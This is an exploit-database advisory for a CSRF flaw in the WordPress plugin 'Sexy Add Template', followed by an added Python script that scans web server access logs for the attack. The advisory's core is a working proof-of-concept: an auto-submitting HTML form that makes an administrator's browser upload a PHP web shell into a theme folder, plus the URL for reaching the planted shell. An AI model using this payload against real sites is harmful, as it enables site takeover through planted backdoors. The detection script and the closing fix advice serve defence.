1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 >> Exploit database separated by exploit type (local, remote, DoS, etc.) 1
1 0
0 [x] Official Website: http://www.1337day.com 1
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 0
0 1
1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0
0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1
1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
||| Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability |||
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
./Title Exploit : Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability
./Link Download : http://wordpress.org/extend/plugins/sexy-add-template/
./Author Exploit: [ TheCyberNuxbie ] [ root@31337sec.com ] [ nux_exploit ]
./Security Risk : [ Critical Level ]
./Category XPL : [ WebApps/ZeroDay ]
./Tested On : Mozilla Firefox + Xampp + Windows 7 Ultimate x32 ID
./Time & Date : September, 22 2012. 10:27 AM. Jakarta, Indonesia.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
||| -=[ Use It At Your Risk ]=- |||
||| This Was Written For Educational Purposes Only |||
||| Author Will Not Be Responsible For Any Damage |||
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
#################################################################################
#
# [ Information Details ]
# - Wordpress Plugin Sexy Add Template:
# The plugin allows an attacker to upload a shell via CSRF.
# http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vulnerable to CSRF: the request does not require the "wpnonce" verification code.
#
# <html>
# <head>
# <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
# <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title>
# </head>
# <body onload="document.form0.submit();">
# <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" method="post" enctype="multipart/form-data" >
# <input type="hidden" name="newfile" value="yes" />
# <input type="hidden" type="text" value="shell.php" name="AM_filename">
# <textarea type="hidden" name="AM_file_content">
# [ Your Script Backdoor/Shell ]
# </textarea>
# </form>
# </body>
# </html>
#
# - Access Shell:
# http://localhost/wp-content/themes/[theme-name]/shell.php
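
For defenders, the two requests described above leave a recognisable trace in the web server access log. The following is an added example, not part of the original advisory: it flags POSTs to the plugin page whose Referer is not the site itself, and later direct requests for PHP files in a theme directory. The log lines, host names and function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache "combined" format); not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Sep/2012:10:27:01 +0700] "POST /wp-admin/themes.php?page=AM-sexy-handle HTTP/1.1" 200 5120 "http://blog.example/wp-admin/themes.php?page=AM-sexy-handle" "Mozilla/5.0"
203.0.113.7 - - [22/Sep/2012:10:31:44 +0700] "POST /wp-admin/themes.php?page=AM-sexy-handle HTTP/1.1" 200 5090 "http://other-site.example/page.html" "Mozilla/5.0"
198.51.100.9 - - [22/Sep/2012:10:32:10 +0700] "GET /wp-content/themes/twentyeleven/shell.php HTTP/1.1" 200 312 "-" "curl/7.27"
198.51.100.9 - - [22/Sep/2012:10:33:00 +0700] "GET /wp-content/themes/twentyeleven/style.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client ip, timestamp, method, request target, status, referer
LINE_RE = re.compile(
    r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"'
)
# WordPress normally includes theme PHP files itself; direct hits are unusual.
THEME_PHP_RE = re.compile(r"^/wp-content/themes/[^/]+/[^/]+\.php$")


def find_suspicious(log_text, site_host):
    """Return (kind, client_ip, timestamp, detail) tuples, in log order."""
    findings = []
    cross_site_post_seen = False
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, ts, method, target, status, referer = m.groups()
        url = urlsplit(target)
        page = parse_qs(url.query).get("page", [""])[0]
        if (method == "POST" and url.path == "/wp-admin/themes.php"
                and page == "AM-sexy-handle"):
            ref_host = urlsplit(referer).hostname  # None when Referer is "-"
            if ref_host != site_host:
                # A missing Referer can also be a privacy setting: triage, not proof.
                cross_site_post_seen = True
                findings.append(
                    ("cross_site_post", ip, ts, ref_host or "(no referer)"))
        elif (cross_site_post_seen and status == "200"
                and THEME_PHP_RE.match(url.path)):
            findings.append(("theme_php_request", ip, ts, url.path))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG, "blog.example"):
        print(finding)
```

A Referer check in logs is only a triage signal; the fix belongs in the plugin, which must verify a nonce and the user's capability before writing any file.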